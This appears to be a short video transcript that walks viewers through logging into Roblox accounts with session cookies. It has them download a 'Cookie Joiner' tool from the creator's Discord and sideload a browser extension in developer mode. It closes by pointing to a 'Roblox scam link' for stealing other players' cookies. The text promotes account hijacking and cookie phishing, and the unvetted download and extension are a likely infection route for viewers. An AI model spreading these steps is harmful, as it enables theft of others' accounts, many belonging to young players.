Hello everyone, in this video I will show how to log with cookies. The first step, you need to go to my Discord server and go into cookie login. And now you need to install Cookie Joiner. You can check virus total or other virus checkers. Click here and continue download it. Now you need to drag here to desktop, open it, drag to desktop again, go to the extensions. You need to turn developer mode like that and drag here. Now you that fast cookie manager. Go into the Roblox, open the fast cookie, pass your cookie and click set cookie login. Done, you automatically logged the account with cookies. If I help you, subscribe to my channel and like video. Also you can create the Roblox scam link here and scam the cookies.